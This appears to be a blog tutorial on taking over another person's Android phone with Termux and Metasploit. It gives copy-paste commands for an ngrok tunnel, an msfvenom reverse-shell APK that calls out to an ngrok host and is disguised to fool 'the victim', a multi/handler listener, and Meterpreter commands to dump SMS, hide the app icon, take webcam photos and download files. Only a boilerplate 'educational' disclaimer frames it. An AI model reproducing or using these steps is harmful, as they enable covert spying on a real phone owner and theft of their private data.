How to hack an android phone using Termux with Metasploit.
In this post, we are going to learn about how to hack an android phone using termux with Metasploit. You can just copy-paste the commands one by one in termux app and it will work perfectly and if you are good in entering command enter manually.
NOTE: This post is only for educational purpose. I and this site do not support any criminal activity. If you are doing any sort of misuse of this information This site is not responsible for that. THIS SITE ONLY SUPPORT ETHICAL HACKING.
Requirements:
1. Termux (Play store link- click here )
2. Metasploit Framework.(I will create another post for it otherwise this post will be 10-20 pages more)
Port Forwarding using Ngrok in termux:
If you wanna use Metasploit on Local Network then you can skip this step(if you and your victim is connected to same WiFi then you can skip this step).
I have already created an post regarding port forwarding but in this post we are going to port forward in android mobile. Show read carefully.
Steps:
1. Go to ngrok.com and create an account.if you already have an account at ngrok then log in.
2. Download the Ngrok zip file on your phone.It will be approx 12Mb file.
3. Now you will see a zip file that you have downloaded from the Ngrok website.
Open termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder , just open file manager and paste the zip file in your internal storage.and go to termux and cd storage.
4. Type this command to copy the zip file in your Home directory of termux.
command- cp ngrok-stable-linux-arm.zip /$HOME
5. Type this command to go back to your home directoty.
command- cd /$HOME or use cd ..
6. Type this command to unzip the file.
command- unzip ngrok-stable-linux-arm.zip
7. Go to Ngrok site again and copy the token,(please copy the full token)
8. Open terminal and type this code and paste your token and press enter.
command- ./ngrok authtoken (Paste the token)
9. Type this command to start port forwarding on port 80.
command- ./ngrok tcp 80
You can use any port number i am using 80 here.
10. If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.
Create payload in Metasploit:
The payload will be an apk file which we are going to install on the victim's phone. That will allow us to Access the victim's android phone remotely when the victim is connected to internet.
1. Open a new session in termux (just swipe your screen from left to right and click on new session).
please make sure the termux have storage permission.
command- termux-setup-storage
Use the above command to allow storage permission.
2. Type this command to create a payload and press Enter.
Please change your LHOST and LPORT as given in the below image.
command- msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
3. Go to your internal storage and you will see Android.apk.(Use apk editor to change ap name and logo so the victim get convinced)
Install this apk in the victim's phone.
Start Listener (msfconsole):
1. Type this command in termux window to start the msfconsole.
command- msfconsole
It can take upto 30 sec to start.
2. Type this command.
command- use exploit/multi/handler
3. Type this command to set the payload.
command- set payload android/meterpreter/reverse_tcp
4. Now set the LHOST at which you wanna listen to the session.
If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP.
command- set LHOST 0.tcp.ngrok.io
(I have used local ip in below photo use the port forwarding ip for better result)
5. Now set the LPORT.
if you are using Ngrok then set the same port which you used while port forwarding.
if you are not using port forwarding then just enter the same port you used to create the payload.
command- set LPORT 80
(I have used local port in below photo use the port forwarding port for better result)
6. This is the last command and the phone will be Hacked.
exploit.
It will connect to the victim and give you meterpreter session.
Some useful commands in Meterpreter.
Find all the commands available:
Command- help
Function- This command will give you a list of commands and a short description of that command.
Get SMS from victim's phone to your phone
Command- dump_sms
Function- This command will give you the most recent 50 SMS from the victim,'s phone. You will get a text file that contains all the SMS with details just use cat command to open the file.
Command- cat sms_dump_20200112185708.txt
Function- Open the SMS log
Hide the icon of the Apk you send to the victim:
Command- hide_app_icon
Function- If you are installing an app on the victim's phones then it obvious that the victim gonna notice that app and chances are the victim will uninstall the app.by using the below command you can hide the app icon from the victim's phone.
Change the audio mode of the victim's phone:
Command- set_audio_mode -m 1
Function- To set the phone on the general mode by using the below command.
Command- set_audio_mode -m 0
Function- To set the phone on silent mode
Capture pictures from the victim's phone:
Command- webcam_snap
Function- This command will capture a photo from the victim's camera and send it to your storage folder.
Access file storage of the victims:
Command- cd /sdcard
Function- You can navigate to the victim's file and see all the data in any folder.
Command- ls
Function- To show directories.
I am not going to give full list of command search on internet for all basic command of termux cuz you can do anything using this commands.
Download any file from the victim's phone:
Command- download file-name
Function- navigate to the file you wanna download and type this command
CONCLUSION:
So now you have a meterpreter session that means you have access to the victim's phone but if the victim delete the app then you can't access the phone again. This is same as android payload created by RAT. But in termux(android) you have to enter command one by one to access each file but in RAT(PC/Laptop) you can do just by making very less clicks. I know this was a very long post. If you are still reading just comment your name I will really appreciate it.
DISCLAIMER: This website DOES NOT Promote or encourage Any illegal activities , all contents provided by this website is meant for EDUCATIONAL PURPOSE only .
Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.
Comments
Post a Comment